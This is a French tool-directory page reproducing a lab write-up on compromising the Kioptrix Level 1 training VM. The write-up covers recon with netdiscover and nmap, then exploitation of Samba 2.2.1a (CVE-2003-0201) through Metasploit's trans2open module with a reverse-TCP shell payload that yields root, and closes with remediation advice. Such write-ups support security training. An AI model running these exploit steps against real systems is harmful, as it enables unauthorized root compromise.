Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Kioptrix-Level1-Vulnerability-Analysis — Audit technique de Kioptrix Level 1. Objectif : exploitation de Samba 2.2.1a (CVE-2003-0201), énumération manuelle et durcissement de l'infrastructure interne. | Kitploit
Outils/GitHubGitHub/deepakkcybersec-eng/kioptrix-level1-vulnerability-analysis
Escalade de PrivilègesReconnaissanceAnalyse des VulnérabilitésExploitationSécurité RéseauTests d'IntrusionApprentissage et ÉducationRed TeamingLabs et Pratique

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
GitHubdeepakkcybersec-eng/kioptrix-level1-vulnerability-analysis

Kioptrix-Level1-Vulnerability-Analysis

Audit technique de Kioptrix Level 1. Objectif : exploitation de Samba 2.2.1a (CVE-2003-0201), énumération manuelle et durcissement de l'infrastructure interne.

Voir le dépôt
2il y a 8 moisPas encore vérifié

Kioptrix Level 1 : Audit de vulnérabilité et exploitation à spectre complet

🏛️ Objectif professionnel

L'objectif était d'effectuer un test d'intrusion structuré sur l'environnement Kioptrix Level 1 afin d'obtenir un compromis complet 'root' et de documenter des stratégies de correction technique adaptées aux opérations des équipes Red et Blue.

🏗️ Reproduction de l'environnement (Contexte matériel)

Les paramètres par défaut de la virtualisation moderne échouent souvent sur les noyaux anciens de 2010. Pour démarrer et mettre en réseau cette machine avec succès, les configurations architecturales spécifiques suivantes étaient nécessaires :

  • Sous-type OS : Linux / Red Hat (32 bits).
  • Architecture de stockage : Passage de SATA à Contrôleur IDE pour prendre en charge le disque dur .vmdk hérité.
  • Protocole réseau : Configuré en PCI FAST-III avec un adaptateur hôte uniquement pour permettre la communication interne avec la machine d'attaque Kali Linux.

⚔️ Analyse offensive (Voie Red Team)

L'exploitation a suivi un cycle de vie manuel allant de l'énumération à l'exploitation :

1. Découverte et reconnaissance

  • Netdiscover : Utilisation de netdiscover -r 192.168.184.4 pour identifier l'IP cible.
  • Scan Nmap : Identification des services incluant SSH (22), HTTP (80), RPC (111) et NetBIOS-SSN (139). Samba 2.2.1a a été signalé comme le point d'entrée principal.

2. Exploitation (trans2open de Samba)

  • Vulnérabilité : CVE-2003-0201 (Débordement de tas).
  • Cartographie MITRE ATT&CK : - Tactique : Élévation de privilèges (TA0004)
    • Technique : Exploitation pour l'élévation de privilèges (T1068)
  • Protocole Metasploit :
    • use exploit/linux/samba/trans2open
    • set RHOSTS 192.168.114.5
    • set payload linux/x86/shell/reverse_tcp
  • Résultat : Obtention réussie d'un shell inversé. La commande whoami a renvoyé root.

🛡️ Correction défensive (Voie Blue Team)

Pour sécuriser un environnement d'entreprise, les stratégies de Gestion des vulnérabilités (VM) suivantes sont obligatoires :

  • Protocole de correction : Mettre à jour Samba vers la dernière version prise en charge (Samba 4.x). La vulnérabilité dans la fonction call_trans2open est corrigée dans toutes les versions modernes.
  • Renforcement réseau : Déployer des pare-feu basés sur l'hôte pour limiter les Ports 139 et 445 aux sous-réseaux internes de confiance uniquement.
  • Stratégie de rôle VM : Cette correction relève des cycles standard de Gestion des vulnérabilités pendant les heures ouvrables, garantissant la stabilité de l'infrastructure.

📝 Preuves techniques et journaux manuels

Les images suivantes documentent l'énumération manuelle en direct et l'exécution en terminal :

Découverte de la cible et notes d'architecture

Notes manuelles 1

Logique de commande Metasploit et configuration de la charge utile

Notes manuelles 2

Preuve d'accès root (capture d'écran du terminal)

Preuve du shell root

Télécharger l’outil